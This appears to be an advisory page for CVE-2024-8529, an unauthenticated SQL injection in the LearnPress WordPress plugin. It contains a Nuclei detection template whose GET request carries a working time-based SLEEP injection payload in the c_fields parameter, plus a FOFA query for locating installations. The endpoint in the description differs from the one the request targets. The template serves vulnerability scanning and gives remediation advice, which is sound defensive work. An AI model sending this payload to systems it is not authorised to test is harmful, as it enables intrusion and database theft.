The LearnPress WordPress LMS Plugin before 4.2.7.1 is vulnerable to unauthenticated SQL injection via the 'c_fields' parameter in the /wp-json/lp/v1/courses/archive-course REST API endpoint, allowing attackers to extract sensitive information from the database.
PoC代码[已公开]
id: CVE-2024-8529
info:
name: LearnPress < 4.2.7.1 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The LearnPress WordPress LMS Plugin before 4.2.7.1 is vulnerable to unauthenticated SQL injection via the 'c_fields' parameter in the /wp-json/lp/v1/courses/archive-course REST API endpoint, allowing attackers to extract sensitive information from the database.
remediation: |
Update the LearnPress plugin to version 4.2.7.1 or later.
reference:
- https://wpscan.com/vulnerability/6b86c089-177b-45b4-979e-4ae08e586e83/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b2671e-0db7-4ba9-b574-a0122959e8fc
- https://nvd.nist.gov/vuln/detail/CVE-2024-8529
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-8529
cwe-id: CWE-89
epss-score: 0.60517
epss-percentile: 0.98189
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
fofa-query: body="wp-content/plugins/learnpress"
vendor: thimpress
product: learnpress
tags: cve,cve2024,wordpress,wp-plugin,wp,learnpress,sqli,time-based-sqli,vkev,vuln
http:
- raw:
- |
@timeout: 30s
GET /wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "duration>=6"
- "contains(content_type, 'application/json')"
- contains_all(body, 'id\":', 'name\":')
condition: and
# digest: 4a0a0047304502210082ce59e1ae5bce25eabdc196bc4c3353f589040fe8217c1bcc2451f1526cd6a40220681569adcb52da33ad99c27fb8e23ad2be0182f2f427e85500acf07f5f29818e:922c64590222798bb761d5b6d8e72950